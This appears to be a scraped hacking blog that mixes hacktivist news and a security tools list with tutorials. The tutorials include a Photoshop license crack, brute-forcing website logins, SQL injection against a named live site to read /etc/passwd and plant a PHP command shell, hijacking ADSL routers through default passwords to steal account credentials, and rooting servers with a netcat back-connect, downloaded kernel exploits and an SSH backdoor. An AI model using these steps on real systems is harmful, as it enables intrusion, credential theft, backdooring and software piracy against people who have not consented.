3xp1r3 Cyber Army hacked 643 Sites

The 3xp1r3 Cyber Army, a Bangladesh hackers group,  continues to protest against the Indian Border Security Force (BSF) and its violent ways. Their latest operation targeted a number of 643 websites that they defaced.

The websites, most likely hosted on a single server, were altered to host the hacktivists’ message.


Apparently, many of the affected sites are from Canada, India and Turkey, but there are also a number of .com domains in the list the hackers published on Pastebin(http://pastebin.com/VwbCMBY5), which means that the targets could be spread out worldwide.

According to softpedia report, many administrators appeared to be working on restoring their websites, but some of the affected ones still displayed the hackers’ message.

 

Romanian Police take 12 Anonymous Romania hackers into custody



#12 alleged Anonymous Romania Hackers has been arrested by Romanian Police. DIICOT, the Romanian #Organized Crime Unit, raided the house of 12 people in Bucharest, Iaşi, Alba Iulia, Piatra Neamţ, Cluj #Napoca, Drobeta Turnu Severin, Arad, Craiova, Reşiţa and Târgu Mureş.

#According to Press release, 24-year-old Gabriel Bălăneasa from Piatra Neam, was the leader of the group. #His name online nicknames are "lulzcart," "anonsboat," "anonsweb" and "carman."

#The group hacked 29 websites by exploiting the SQL injection vulnerability and defaced them. According #to the police, hackers used tools such as Havij, SQLMap for the attack.
 

2 UK police and US Navy.mil sites hacked by 'The Unknowns' Hackers



The Unknown hackers group claimed to have hacked into the Essex Police(www.essex.police.uk) , Port Of Tilbury Police,SEMPRA ENERGY(www.portoftilbury.police.u) and US Navy(navy.mil) and Deutsch Federal Government sites.

To prove unauthorized access to those websites , the hackers have made public a number of screenshots, along with large amounts of information obtained from the breached sites.

Hackers leaked the confidential data in AnonPaste. One of the leak contains username and password details belong to the two UK police sites( Essex Police and Port Of Tilbury Police sites). The other leak contains sensitive data belong to Deutsch Federal Government,SEMPRA ENERGY, US Navy.

Last month, hackers break into NASA, US Air Force, ESA sites and leaked confidential data. In the last month press release, hackers proclaimed that they are going to attack more sites.

“And for all the other websites out there: We're coming, please, get ready, protect your website and stop us from hacking it, whoever you are. Contact us before we take action and we will help you, and will not release anything... It's your choice now,”


The recent hack clearly indicates that hackers started to implementing what they have proclaimed.
 

Top 15 Security/Hacking Tools & Utilities


1. Nmap
Nmap is a free open source utility for network exploration or security auditing. Its design to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.
Can be used by beginners (-sT) or by pros alike (–packet_trace). A very versatile tool, once you fully understand the results.
Get Nmap Here



2. Nessus Remote Security Scanner
Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the world’s largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.
Get Nessus Here



3. John the Ripper
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.
Click here to get JTR


4. Nikto
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated.
Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).
Get Nikto Here


5. SuperScan
Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.
If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.
Get SuperScan Here


6. p0f
P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:
– machines that connect to your box (SYN mode),
– machines you connect to (SYN+ACK mode),
– machine you cannot connect to (RST+ mode),
– machines whose communications you can observe.
Basically it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine.
Get p0f Here


7. Wireshark (Formely Ethereal)
Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.
Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.
Get Wireshark Here

8. Yersinia
Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).
The best Layer 2 kit there is.
Get Yersinia Here


9. Eraser
Eraser is an advanced security tool, which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.
An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.
Get Eraser Here.


10. PuTTY
PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4x0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.
Get PuTTY Here.


11. LCP
Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing.
A good free alternative to L0phtcrack.
Get LCP Here

12. Cain and Abel
My personal favorite for password cracking of any kind.
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.
Get Cain and Abel Here


13. Kismet
Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.
A good wireless tool as long as your card supports rfmon (look for an orinocco gold).
Get Kismet Here


14. NetStumbler
NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:
  • Verify that your network is set up the way you intended.
  • Find locations with poor coverage in your WLAN.
  • Detect other networks that may be causing interference on your network.
  • Detect unauthorized “rogue” access points in your workplace.
  • Help aim directional antennas for long-haul WLAN links.
  • Use it recreationally for WarDriving.
Get NetStumbler Here


15. hping
hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.

Get hping Here
 

Crack Adobe Photoshop CS5 Extended Manually By XBID


Adobe Photoshop CS5 Extended is the professional software for graphics designers and its very helpful in image editing. But the thing is that Adobe Photoshop CS5 Extended is not freeware it means they are just providing the trial version for 30 days after that it will ask you for serial key. If you have used Adobe Photoshop CS5 Extended then you may know that its not allowing fake serial key so we need to crack Adobe Photoshop CS5 Extended. For that just follow the simple steps.

1. go to C:\Windows\System32\drivers\etc
2.now double click on HOSTS file and paste the following code in to that file.

127.0.0.1 hl2rcv.adobe.com
127.0.0.1 adobeereg.com
127.0.0.1 activate.adobe.com
127.0.0.1 practivate.adobe.com
127.0.0.1 ereg.adobe.com
127.0.0.1 activate.wip3.adobe.com
127.0.0.1 ereg.wip3.adobe.com
127.0.0.1 wip3.adobe.com
127.0.0.1 activate-sea.adobe.com
127.0.0.1 wwis-dubc1-vip60.adobe.com
127.0.0.1 activate-sjc0.adobe.com
127.0.0.1 3dns.adobe.com
127.0.0.1 3dns-1.adobe.com
127.0.0.1 3dns-2.adobe.com
127.0.0.1 3dns-3.adobe.com
127.0.0.1 3dns-4.adobe.com
127.0.0.1 adobe-dns.adobe.com
127.0.0.1 adobe-dns-1.adobe.com
127.0.0.1 adobe-dns-2.adobe.com
127.0.0.1 adobe-dns-3.adobe.com
127.0.0.1 adobe-dns-4.adobe.com
127.0.0.1 adobe-dns-5.adobe.com
127.0.0.1 hh-software.com
127.0.0.1 www.hh-software.com
127.0.0.1 activate.adobe.de
127.0.0.1 practivate.adobe.de
127.0.0.1 ereg.adobe.de
127.0.0.1 activate.wip3.adobe.de
127.0.0.1 wip3.adobe.de
127.0.0.1 3dns-3.adobe.de
127.0.0.1 3dns-2.adobe.de
127.0.0.1 adobe-dns.adobe.de
127.0.0.1 adobe-dns-2.adobe.de
127.0.0.1 adobe-dns-3.adobe.de
127.0.0.1 ereg.wip3.adobe.de
127.0.0.1 activate-sea.adobe.de
127.0.0.1 wwis-dubc1-vip60.adobe.de
127.0.0.1 activate-sjc0.adobe.de
127.0.0.1 wwis-dubc1-vip60.adobe.de
127.0.0.1 hl2rcv.adobe.de
127.0.0.1 nero.com
127.0.0.1 www.nero.com
127.0.0.1 activate.nerao.com
127.0.0.1 www.activate.nero.com
127.0.0.1 nero.de
127.0.0.1 www.nero.de
127.0.0.1 activate.nero.de
127.0.0.1 www.activate.nero.de
127.0.0.1 validation.sls.microsoft.com

 3. After that save that file. If its not allowing you to save that file then read our previous tutorial in that I have explained how to give write permission to hosts file.

4.Now open Adobe Photoshop CS5 Extended and just enter this serial key


1330-1245-8292-4567-6480-4584

And press Ok after that it will not ask you for serial key
 

Download as premium user from hotfile,rapidshare.etc


Download as premium user from hotfile,rapidshare,
NOW YOU CAN DOWNLOAD FROM HOTFILE,RAPIDSHARE,MEGAUPLOAD FOR FREE. I WILL GIVE YOU THE LINK OF 100 % WORKING PREMIUM LINK GENRATOR.IT HAVE NO SPEED LIMIT,HAVE REUME CAPABILTY .BUT IT HAVE A LIMIT OF DOWNLOADING 3 FILES PER IP .TO BYPASS THIS YOU CAN RESTART YOUR MODEM AND CAN CHANGE YOUR IP.

JUST GO TO WEBSITE SELCT SERVER,FILL CAPTCHA AND PASTE LINK THAT U WANT TO DOWNLOAD.
HERE ARE LINK :
============
FOR RAPIDSHARE::

http://rsplg.com/


http://leechrs.com/
============

=============
FOR HOTFILE::

http://hfplg.com/
=============

=============

FOR MEGAUPLOAD::

http://muplg.com/
-=============
 

How To Hack Website Login Using Burute Force Add-one Fireforce


So Friend I am Gonna Tech You How To hack Website Logins Using BurteForce Tool Fireforce

This Tool Is Very Simple To Use..

What Is FireFOrce Fireforce is a Firefox extension designed to perform brute-force attacks on GET and POST forms.


1.STep---->>>>>> Just Download Fireforce

[ Download ]

2.Step---->>>>>> Download And Install In Fireforce

3.Step---->>>>>> Search Any Login Page I am Using Blind String In My Password List

Admin Is Username And Password In Dictionary All Blind String In One Text File


You Can See The Screen Shot Here

Pic 1



Type Username In Admin You Can Use Anything Witch One Is Working I am Using Admin Becoz Admin Is Velid UserName

Now Rightclick In Password Box Select Fireforce

I am Using Dictionary Attack

Pic 2 Found Password admin'-- <<<<<<Blind String



wait For Cracking

Pic 3 Successfully Login Tongue



Thanks...........
Regard Yogesh Kashyap

To Short And SImple Tutorial
 

How Vulnerable Is Your PC ?




Test Description

What's the security rating of your PC?

Comodo Firewall Test Suite is an all-in-one application that sequentially launches 34 of the most effective leak tests against your computer's security. When the full cycle of tests has been completed you will be provided with detailed results that will inform you which individual tests your system is vulnerable to.

Your system will also be awarded an overall security score based upon its overall performance against the suite of tests. (Highest and most secure score = 340)


 

25 Minutes Free Worldwide Calling Trick

Hello Frnds Today M give you A new Free WorldWide Calling Tips Follow Simple Steps And get Free 25 Calling Mints , you Can use it on yourr mobile And Pc

  1. Click here to go to Vyke.
  2. Register your mobile number then you will receive two msgs to confirm your account.
  3. After confirmation click on ‘vyke assit call’ then enter your number in 1st box in 2nd box put which number which number you want to call. Then you will receive a call in 1st box number when you attend this call then 2nd box number get a call.Now your call is connected
  4. You can use it on mobile and pc.



Note :- If u Are Subscribe DnD Servise on your Mobile You Not Able To Recived  This Sms

If u Like this tricks Comment here And Also Click On Subscribe Button
 

Get A Free Real Facebook Like , Subscriber, Commenters On Your Page And Profile

  

Facebook Auto Like Lab


Hello All My Friends Today m give A new Trick How to Get Free Real Facebook Likes, Photo likes, Comment likes  Posts and Status. Get Fastest Delivery of Facebook Likes From Active FB Accounts from your Targeted Audience. Increase your Social Presence for Free.Easiest way of Getting maximum number likes on facebook page, post and status likes , All Facebook likes are real Human, No Risk on your FB Account


Follow Simple Steps And Get


1:- Go To Facebook Auto Like Lab

2 :- Click To Connent Button

3 :-  then Click To subscribe Buttons To Get 3000+ likes

4 :- Click to Share button And Fill The box Means put your Profile Adress in the Box  And click to sumbit button

And See magic 5- 10 days your Profile And page populer in the facebook ..
m also use this trick. and its working fine  if u like this tricks click to share button And like our facebook page
 

[TuT]Remove Cpalead And Others Surveys[TuT]



Method 1.
Disable Javascript in browser, this might cause a few inconveniences, but it’s a good option if you don’t have administrative rights to edit windows hosts file.

Method 2.
Open notepad(choose to run as administrator), edit this file: %SystemRoot%\system32\drivers\etc\hosts
Hosts is a file without extension, add the following lines:
127.0.0.1 cpalead.com
127.0.0.1 tracking1o1.com

and that’s it.

If you don’t plan on visiting any survey ads, you can block other survey ad sites, by adding the following:

127.0.0.1 adultaccessnow.com
127.0.0.1 adscendmedia.com
127.0.0.1 oocee.com
127.0.0.1 perfecttracking.com
127.0.0.1 cpalock.com
127.0.0.1 dollarade.com
127.0.0.1 blackhatcodebreaker.com
127.0.0.1 instantdollarz.com
127.0.0.1 leadbolt.net
127.0.0.1 pointclicktrack.com

this will block the sites above from our computer.
 

[TUT] Uploading Shell Without Getting into Admin Pane






- This Tutorial is not N00b friendly - If you use Tools for SQL injection don't bother reading this -




Vulnerable Link :
Code:
http://www.trends-in-newsrooms.org/articles.php?id=
There is total 14 Columns and i took 1 as visible
Code:
http://www.trends-in-newsrooms.org/artic...,4,5,6,7--

now try to see if you can load_file in the visible column.. We can read files in this server using this command.

Usually you can exec this command if you have access to table mysql.users--

example : - 1 union all select load_file('filetoload'),2,3,4,5,6 from mysql.users--


Ok now lets take the case of this website.. lets try to read its /etc/passwd so we can get the actual path where the website is located.
Code:
http://www.trends-in-newsrooms.org/articles.php?id=1+and+2=1+union+all+select%20load_file%28%27/etc/passwd%27%29,2,3,4,5,6,7--
The website will display the '/etc/passwd' file.

Code:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh stephane:x:1000:1000:stephane,,,:/home/stephane:/bin/bash sshd:x:100:65534::/var/run/sshd:/usr/sbin/nologin mysql:x:101:103:MySQL Server,,,:/var/lib/mysql:/bin/false Debian-exim:x:102:104::/var/spool/exim4:/bin/false statd:x:103:65534::/var/lib/nfs:/bin/false identd:x:104:65534::/var/run/identd:/bin/false postfix:x:105:106::/var/spool/postfix:/bin/false postgres:x:106:108:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash sympa:x:107:110:Sympa mailing list manager,,,:/var/lib/sympa:/bin/false ftpd:x:1001:1001::/home/ftp:/bin/nologin juancarlos:x:1002:1002:Juan Carlos Cedillo,,,:/home/juancarlos:/usr/lib/sftp-server clamav:x:108:111::/var/lib/clamav:/bin/false libuuid:x:109:112::/var/lib/libuuid:/bin/sh wanadmin:x:1003:1003:Stephane Karges,,,:/home/wanadmin:/bin/bash aralynn:x:1004:1004:Aralynn McMane,,,:/home/www/vhosts/wan-press.org/httpdocs/nie/downloads/:/usr/lib/sftp-server
/home/www/vhosts/wan-press.org/httpdocs/

Probably this is the path where the site seems to be located, which i am not very sure although... Lets see if we can write a file in this directory..

I dont want any numbers to be written on the file i am going to write into the server. so i am gonna change 2,3,4,5,6,7 to 'null'

Code:
http://www.trends-in-newsrooms.org/artic...c.php%27--
Fayul~ we get a response.


Code:
Can't create/write to file '/home/www/vhosts/wan-press.org/httpdocs/epic.php' (Errcode: 13)
It means the path is not chmod to 777 that we can write any file there or we don't have permissions to write into another website using mysql. Okay lets try writing it somewhere else.


Code:
http://www.trends-in-newsrooms.org/artic...all+select 'L33t~cyb3r_***~was~here',null,null,null,null,null,null+into+outfile+'/var/tmp/fayul'--
Page loads fine, Now check..

Code:
http://www.trends-in-newsrooms.org/artic...,4,5,6,7--
Site will display "l33t~cyb3r_***~was~here"

Similarly, if you can find path of this website you can write a php backdoor. Replace l33t cyb3r_*** was here with..



Shell Code :
Code:
'<? system($_REQUEST['cmd']); ?>'
After you upload to path of site succesfully you can upload your shell by going to site



Code:
http://www.site.com/pathtoyourbackdoor/lol.php?cmd=ls -la
__________________
 

Hacking ADSL Routers for free accounts



Most of the people never change their default passwords no matter what it is, they don't change them because they think that they are safe. In this tutorial I'll show you one of the ways how to use this mistake and get free ADSL/Wireless (If wireless router is used) accounts and enjoy in unlimited downloads.

First we will download the necessary tools:

Be careful when downloading, this user have not provided scan link.
- Bounty Hunter

1.) XPass Link removed by mod
2.) Angry IP Scanner v3.0.4 Beta
3.) If you don't have Java installed, download and install it here: JAVA

You will also need to have version 8 OR older of Internet Explorer.

Ok so let's start with getting the job done:

1.) Go to WhatIsMyIp
and check your IP address, let's say that your current (ADSL providers usually give you dynamic IP's) IP is 67.140.112.83, you will change the last two groups of numbers.

2.) Open Angry IP scanner it will look like this:



Now where it says IP range in the first input field we'll enter our IP address 67.140.112.83 (but we'll change the last two-or three digits, in this case there are two to zero) so it will be like this: 67.140.112.0

And in the second input field we will enter the IP with changed last two groups of numbers so it actually has something to scan, we'll change it to:

67.140.150.254

And before we click scan we need to set some options so it only shows us alive hosts:

Click Tools and then click preferences:


Then under the under the ports tab under Port Selection type 80 'cos we will be interested in hosts with port 80 opened:


And on the display tab choose "Hosts with open ports only":



Then click OK to save the preferences and click start:



After few seconds or minutes you should see your first IP addresses:



Now just select one of the IP addresses and open it with INTERNET EXPLORER!!!

It will ask you for a login credentials:



Now here comes the mistake people often make, default username and password, in this case it was admin:admin but you can look for default router passwords and usernames, so when I logged in it looked like this:



Now for most of the routers (atleast the ones I had exp. with) you can find username in plain text and password covered with *'s when setting up a new connection, so just look for something that says connection wizard or connection setup, and follow the steps till you find the username and password as mentioned.

So why did we use Internet Explorer for this??

Because XPass works only with IE, we couldn't figure the pass out if we used Firefox or Chrome or Opera.

And now when we have the page where username and pass. are just open XPass click on the X sign and drag it over the *'s and you will have this:



And password in this case is: 854179

Continue doing this with different IP's that Angry IP Scanner detects till you have enough accounts to fulfill your download needs.

Hope you liked the tutorial.

Don't forget to comment :)
 

how to Access Any Website Or Forum Without Registering

 
 
All websites and forums will block unregistered users, but they won’t block Google Bot. What we will do is to switch our User Agent to that of Google Bot and freely browse any website or forum without registering.




First grab the add-on for Firefox called ‘user agent’ here and install it. Now go to Tools > User Agent Switcher > Options and then again to Options.


Select User Agent from the left sidebar and click Add. Now in the description field type:

crawl-66-249-66-1.googlebot.com

and in user agent field type:

Googlebot/2.1 (+http://www.googlebot.com/bot.html)

as shown in the screenshot below.


Select Google Bot as your User Script by going to Tools > User Agent Switcher.



Now browse any website or forum without registering.

Hpoe you like my tut...thanks.
 

Learn Root - Totally Explaind :p








#So Lets Start...

These are Some Basic Questions asked by myself as a n00b Tongue

# What is rooting ?
A. Getting access to the user => "root", the main admin of the site.


# What is the need of rooting ?
A. Getting *** admin privillages of Servers


Things you need



# A Shell on a Website
# An Exploit
# Log cleaner
# Ssh Backdoor
# Netcat
# A Brain

Simply you can seach on http://www.google.com for these, except BRAIN and SHELL


Getting Back Connection to the servers


Open command prompt, and go to NetCat Path, Type
"cd netcat.exe"

ok Open your Shell in your browser, go to the back connection tab, if it is not there get a shell like "WSO 2.3" or Any other
thats your choice....

Specify your "ip & port as 2121". press connect, now you'll get a shell to the server, you can give commands to the server through that shell.

now came back to netcat and type "nc -l -v -p 2121"

it will give you this output:
Code:
c:\netcat>nc -l -v -p 2121
listening on [any] 2121 ...


Getting a Right exploit for the servers


Type : Uname -a & hit enter.
It'll look something like this:

Code:
[admin@www.target.com /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux

You have noted, It shows the kernal version of the server is: 2.6.18-194.26.1.el5
& Year is 2010.

You need to find a perfect exploit for it. you can find them at:-
$ Exploit-db.com
$ Packetstormsecurity.org
$ Th3-0utl4ws.com
$ Leetupload.com


Compiling & executing exploits


Now I've got a exploit, & it is written in C. So I can't execute it by just uploading. but I need to compile it.

Before proceeding further, Cd into the tmp directory, because it is always writable. So type: Cd /home/XXXXX/public_html/tmp
// The path may be different, replace it with yours.

So first I'll get the exploit on the server, So I type : Wget http://exploitsite.net/2010-exploits/exploit.c
// Note: There is no such site, I'm just taking it to show you.
It'll look something Like this:-

Code:
admin@www.target.com /home/target_usernemr/public_html/tmp]$ wget http://exploitsite.net/2010-exploits/exploit.c
--2011-01-25 08:21:43-- http://exploitsite.net/2010-exploits/exploit.c
Resolving www.exploitsite.net... 199.58.192.192
Connecting to www.exploitsite.net|199.58.192.192|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15088 (15K) [text/x-csrc]
Saving to: `exploit.c'


now change the permission of the exploit to 777.
Type: "Chmod 777 exploit.c"

Now the exploit is On my server, I just need to compile & execute it.
So, I'll give the command: "gcc -o exploit exploit.c"
It'll compile & save the exploit as >> exploit

Next step is to execute it So we'll type: "./exploit"


here it'll show different process...
: #
: #
got root you m0f0 !! [<example]


Now it say got root. Let's Check is it true,
Type: "whoami"

then it will say "root"

like: uid=0(root) gid=0(root) groups=0(root)

type "su" to get full privilages !


Installing Backdoors

type: "Wget http://www.urlofbackdoor.com/sshdoor.zip"


Then Type,
Unzip Sshdoor.zip
Then, => Cd sshdoor
Then type, ./run pass port
^ replace pass with your password, & a port.

Now connect with putty & enjoy root privileges.


Methods to execute exploits written in other languages


C exploit

----------------------
gcc -o exploit exploit.c
chmod +x exploit
./exploit
----------------------

Perl Exploits

---------------
perl exploit.pl
---------------

Python

------------------
python exploit.py
------------------

php

-----------------
php exploit.php
-----------------

zip

----------------
unzip exploit.zip
./run
----------------

 

How Not To Get Hacked




Follow These Simple Guidelines n u are done

1. Stop using Internet Explorer and make the switch to Opera, it’s more secure, plain and simple.
2. Get Spybot Search and Destroy or Spyware Doctor and immediately update it.
3. Get Adaware SE and immediately update it.
(Use both as a 1-2 punch on infected client computers and between the two there’s not much they won’t kill)
4. Update your anti virus
5. Boot into safe mode and run all three scans
6. While the scans are going check your registry (Click start –> Run and type regedit to get intot he registry) and look in HKEY_CurrentUser/software/microsoft/windows/currentversion/run & HKEY_Local_Machine/software/microsoft/windows/currentversion/run. Verify that all programs listed are legitimate and wanted.
7. If or when your antivirus scan comes across anything, search for that file name in your registry and delete it.
8. Use explorer to go to the windows/system32 folder and sort by date. If you haven’t already done so, make sure you can see the entire file names. click Tools –> Folder Options and unclick the box labeled “Hide extensions for known file types” and under Hidden files and folders click “Show hidden files and folders.” However, make sure you choose “Hide protected operating system files” so you don’t accidentally remove anything that would cripple your computer.. You are looking for recent files with names ending with .exe and .dll that look suspicious. Major culprits will have gibberish names such as alkjdlkjfa.exe.
9. Once you can get clean scans in safe mode, reboot in normal mode and scan all over again. If you can’t get a clean scan in regular mode then you have something more persistant that could take more research.
10. Make sure your firewall doesn’t have strange exceptions.
11. If you suspect anything that is going wrong with your computer is the action of a stalker, on a more secure system change all your passwords.
12. If your system has been specifically targeted and hacked you can never be 100% sure that your system is no longer compromised so start with 11, make backups of personal files on the infected system and format and re-install Windows.
Good luck!

 

Remove Junk/Trial Software from your PC





Nowadays, when you first start up your computer, you are likely to be greeted with dozens of colorful icons on your desktop asking you to sign up for trial offers from the likes of America Online, Earthlink, Google, and other software makers.
Sure, you can manually uninstall all of these junk programs, but why should you have to when a program called PC Decrapifier will do it for you. The free program gets its name from the fact that the junk software that comes pre-loaded on new computers are often referred to as “craplets”.
To get started clearing out these craplets, all you need to do is start PC Decrapifier, create a restore point (just in case you remove something that you shouldn’t), and then select the programs that you want to remove.
So free up some screen real estate by removing those MusicMatch, AOL, Norton, “Get High Speed Internet!”, and QuickBooks Trial icons from your desktop. PC Decrapifier works on both Windows XP and Vista
 

Download Multiple Youtube videos in a batch with a click


YouTube doesn’t make it easy to download videos so several dozen tools and websites have sprung up that cater to the packrat in all of us, but most of them lack the ability to download YouTube videos in bulk.
Enter DownloadHelper, a Firefox extension that not only supports downloading videos from YouTube, but also Dailymotion, MySpace, Google Video, and about 100 other popular and niche video sharing sites.
To download (or in this case, leech) multiple YouTube videos with one click, first highlight a region of the webpage that contains links to YouTube videos and then right-click to bring up the context menu.
Now select “Download videos from YouTube link(s)”. The videos you want to save will automatically be queued for download and saved to a location of your choice.
One big advantage of using a browser-based downloading tool rather than a web-based one is that you have a lot more privacy. Web tools can log what videos you download, but many browser tools can work without accessing third-party servers.
 

See All Pictures Of Album In Fullsize At A Time !!

See All Pictures Of Album In Fullsize At A Time 

                                    

Use This CODE:

javascript:d=document.body.innerHTML; m=d.match(/http:..images3.orkut.com.images.milieu.{1,99}jpg/gi);
for(z=0;z”)};void(0)

*Method To Use*

Open Andbody’s Album You Want To SeeJust Paste This CODE & (Press Enter)or(GO)it works
                                                                                ~cheers ~
 

GET FREE Space 30 gb freeeeeee




Gmail is really famous among users of all the email clients available on the web and that is not because it has a cool interface rather it is famous for its reliability and huge space (10GB now thats something). Google doesn’t stop here and recently Google announced that users can now buy more online storage for Google services just by paying a little amount. So why not use this online storage space and use it externally (Probably as a network drive or one of your own computer hard drives).
Use Google Storage Space as Google Drive

Here I have some great little utilities (3 softwares and 2 web scripts) that you can try to use your Gmail account space as your external hard drive. You will be able to download (or should I say copy) attachments from your Gmail account to your computer just as you would do from a drive on your computer. You can also use this space to upload content direct from your computer and save it online in your Gmail account.
1. GMail Drive


GMail Drive is third party addon for Windows that lets you use your Gmail account space as an extra drive on your computer. It allows a user to access a virtual drive stored in a Gmail e-mail account by causing the contents of the Gmail account to appear as a new network share on the user’s workstation. In order to use this add-on, the user needs a Gmail e-mail account. The add-on enables the user to use the standard Windows desktop file copy and paste commands to transfer files to and from the Gmail account as if it was a drive on the user’s computer.


2. GSpace


GSpace is a firefox extension that turns your 3GB of your Gmail account into free online storage. With Gspace you can manage unlimited Gmail accounts to store all type of files within its simple, user friendly interface. You can also listen your favourite stored music directly from your Gspace, view your collections of pictures and manage your Gdrive files as well.


3. GmailFS

GmailFS or Gmail File System is a virtual file system developed by Richard Jones which allows users to mount and use their Gmail email account’s storage as a local disk drive. GmailFS is written for Linux, but Windows and Mac OS X ports do exist. Using GmailFS will provide the user with roughly three gigabytes of online storage. The speed of this filesystem is limited by the speed of the user’s Internet connection, and the upload/download speed of the Gmail server. Files can be any size, and are stored as (segmented) attachments.
4. G-Share

G-Share is a PHP script that allows you to share your gmail attachments in a webpage, it is a download center with files stored in your Gmail account. You need a MySQL database to store data such as download counters, visitors, etc


5. PHP Gmail Drive

PhpGmailDrive, also known as PGD, is an open source software program written in PHP to share Gmail file attachments on the web. PGD is based on GmailFS, a Gmail attachment file system that uses email subjects for organization.
 

To hide the Blogger NavBar:





To hide the Blogger NavBar:

- Log in to blogger
-
 On your Dashboard, select Layout . This will take you to the Template tab. Click Edit HTML. Under the

Edit Template section you will see you blog’s HTML.

- paste the CSS definition in the top of the template code :
 

Orkut Hacks





As I’m Orkut user I like these sites and Orkut hacks on it, the following are some of my collection regarding Orkut hacks

1) Zeetab(Orkut Star) – Computer World, Orkut Computer Tips and Tricks, Free Sms, Wallpaper, Mobile Software Game Ringtone Themes, Free games, Orkut Software, Bollywood wallpaper, MP3, FM Rradio and many more

2) Thisisorkut.org (TIO) – This Is Orkut (T.I.O) was created to provide more info and help tracks to Orkut users for their convenience. Easy to use Java Scripts, Online Toolbars, Help References, Trouble shooters, and lot more….
3) CrazySouls.com – Crazy souls have created many orkut scripts and they are really useful and working. Not only scripts they also profide stuffs for MSN, Cheets and many more
4) Trickfriend.com – Here, on this website, you will find tips and tricks that will help in making your life easier on Orkut. This webpage also contains many sftware related to Orkut
5) Tools Home – This site is developed by 15 yr Old boy, this site contains some cool stuffs and software
6) ScrapMania.com – This site provide services like Messages, Generators, ASCII Art, Bar Arts, Images, Emotions, Smailies and many more
7) Orkut Underworld – This is blog which have awesome collection of orkut tips and tricks, softwares and many more. In short simple blog but useful blog
8) Orkutrix.com – In the world of Orkut tricks! You find only GENUINE and popular orkut tricks and scripts here. Browse through the menu for those tricks but they also provide some hacking tricks of orkut
9) InsideOrkut.com – According to me this is the best of all because this website posts all the current information in orkut, this website is very useful for begineers and also for everyone
